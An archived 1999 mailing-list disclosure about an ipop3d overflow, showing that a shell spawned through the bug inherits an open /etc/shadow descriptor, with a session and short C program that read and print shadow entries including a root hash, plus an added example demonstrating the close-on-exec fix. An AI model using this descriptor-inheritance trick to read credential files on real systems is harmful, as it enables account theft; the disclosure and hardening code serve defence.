On Tue, 6 Apr 1999, Stefan Rompf wrote:

> Hello Michal,
>
> At 01:41 07.03.99 +0100, you wrote:
>
> >Exploited overflow in ipop3d could be used to gain superuser access (the
> >only thing done by ipop3d is setuid+setgid, no seteuid/setreuid).
>
> Fortunately, you are wrong here. Quoting from the Solaris' setuid() manpage:
>
>      If the effective user ID of the process calling setuid() is
>      the super-user, the real, effective, and saved user IDs are
>      set to the uid parameter.
>
> Linux behaves the same way, IMHO this is defined in POSIX.

But, (un)fortunately, when exploiting ipop3d I found something like this:

Grabarz:~emsi# lsof -n | grep 1190
sh   1190 emsi  cwd  DIR  8,1    1024     2 /
sh   1190 emsi  rtd  DIR  8,1    1024     2 /
sh   1190 emsi  txt  REG  8,1  279352 16324 /bin/bash
sh   1190 emsi  mem  REG  8,1   78828 30629 /lib/ld-linux.so.1.9.5
sh   1190 emsi  mem  REG  8,1   11493 79564 /lib/libtermcap.so.2.0.8
sh   1190 emsi  mem  REG  8,1  605044 79566 /lib/libc.so.5.4.33
[...]
sh   1190 emsi   3r  REG  8,1     598 24674 /etc/shadow

The shell spawned via ipop3d exploitation (no bonus -- no exploit core) inherits the open fd :)

So we may do something like this:

emsi:~emsi# telnet grabarz 110
Trying 192.168.0.19...
Connected to grabarz.
Escape character is '^]'.
+OK Grabarz POP3 3.3(20) w/IMAP2 client (Comments to MRCat_private) at Fri, 9 Apr 1999 15:19:33 +0000 ( )
user emsi
+OK User name accepted, password please
pass qpqp01
id;
uid=1002(emsi) gid=100(users) groups=100(users) : command not found
bash -i;
bash$ cd ~emsi
cd ~emsi
bash$
bash$ cat p.c
cat p.c
#include <stdio.h>
#include <unistd.h>
/* fd 3 is /etc/shadow, inherited from ipop3d; buf is not NUL-terminated,
   hence the trailing garbage in the output below */
char buf[255];
int main(void) {
    lseek(3, 0, 0);
    read(3, buf, 255);
    printf("Be my guest:\n%s\n", buf);
}
bash$
bash$ gcc p.c
gcc p.c
bash$ ./a.out
Be my guest:
root:csKcGWMEUMGUs:10539:0:::::
halt:*:9797:0:::::
operator:*:9797:0:::::
shutdown:*:9797:0:::::
sync:*:9797:0:::::
bin:*:9797:0:::::
ftp:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
mail:*:9797:0:::::
postmaster:*:9797:0:::::
newż¤ţ^ `
bash$
bash$

That's only an example...
It proves that exploiting ipop3d could be useful to obtain root (or any other account) access and that the vulnerability should be fixed.

P.S. Greetings Lam3rZ Group, 3Kombajd_do_czereśni testers and Lcamtuf (hey lamer, are you finally going to send me that txt you promised me? ;).

--
___________________________________________________________________________
M.C.Mar          An NT server can be run by an idiot, and usually is.
emsiat_private   "If you can't make it good, make it LOOK good." - Bill Gates
                 Maybe this isn't the place, but M$ programs, for instance,
                 are real monuments to stupidity.
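The program below is an added example, not part of the original post and not ipop3d's code. It reproduces the condition emsi describes in a controlled way: a throwaway file standing in for /etc/shadow (its one line is constructed, not a real hash) is left open on fd 3, a shell is exec'd, and the shell reports whether it could still read that descriptor. It then shows the fix a privileged daemon should apply before it ever parses attacker-controlled input: mark every descriptor above stderr close-on-exec (or open such files with O_CLOEXEC, or better, not keep them open at all while talking to the client), so that a shell reached through an overflow inherits nothing but 0, 1 and 2. The function names and the temp-file path are this example's own, and it assumes Linux/POSIX with /bin/sh available.

```c
/* Added example: privileged file descriptors survive execve() unless they are
 * marked close-on-exec.  Not from the original post; assumes Linux/POSIX and
 * /bin/sh.  File content and function names are this example's own. */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* The fix: mark every open descriptor above stderr FD_CLOEXEC.  A daemon
 * should do this (or use O_CLOEXEC at open time) before handling untrusted
 * input.  Returns how many descriptors were hardened. */
int close_on_exec_all(int maxfd) {
    int n = 0;
    for (int fd = 3; fd < maxfd; fd++) {
        int flags = fcntl(fd, F_GETFD);
        if (flags == -1) continue;                     /* not open */
        if (fcntl(fd, F_SETFD, flags | FD_CLOEXEC) == 0) n++;
    }
    return n;
}

/* Reproduce ipop3d's situation: a "shadow" file open on fd 3, then exec a
 * shell (the attacker's payload) and see whether it can read fd 3.
 * Returns 1 if the descriptor leaked into the shell, 0 if not, -1 on error. */
int fd_leaks_across_exec(int harden) {
    char path[] = "/tmp/shadow-demo-XXXXXX";          /* hypothetical path */
    int fd = mkstemp(path);
    if (fd == -1) return -1;
    unlink(path);                                      /* keep it anonymous */
    /* constructed stand-in for a shadow entry, not a real hash */
    const char secret[] = "root:$6$constructed$notarealhash:10539:0:99999:7:::\n";
    if (write(fd, secret, sizeof secret - 1) < 0) return -1;
    lseek(fd, 0, SEEK_SET);

    /* ipop3d had the file on fd 3; put it there.  dup2() clears FD_CLOEXEC on
     * the target, which is exactly the default a careless daemon ends up with. */
    if (fd != 3) {
        if (dup2(fd, 3) == -1) return -1;
        close(fd);
    }
    if (harden) close_on_exec_all(64);

    pid_t pid = fork();
    if (pid == -1) return -1;
    if (pid == 0) {
        /* The spawned shell tries to read from inherited fd 3.  The
         * redirection fails (non-zero exit) if the fd was closed on exec. */
        execl("/bin/sh", "sh", "-c",
              "exec 2>/dev/null; read -r line <&3", (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) == -1) return -1;
    close(3);
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 1 : 0;
}

int main(void) {
    printf("unhardened: fd 3 leaked into exec'd shell = %d\n", fd_leaks_across_exec(0));
    printf("hardened:   fd 3 leaked into exec'd shell = %d\n", fd_leaks_across_exec(1));
    return 0;
}
```

The unhardened run returns 1 (the shell read the line through fd 3, as the posted lsof output and p.c show), the hardened run returns 0. Note that FD_CLOEXEC only protects against the exec; a payload that reads the descriptor directly from inside the exploited process, without exec'ing a shell, still gets the data, which is why not holding the file open at all while serving the client is the stronger fix.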
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:41:46 PDT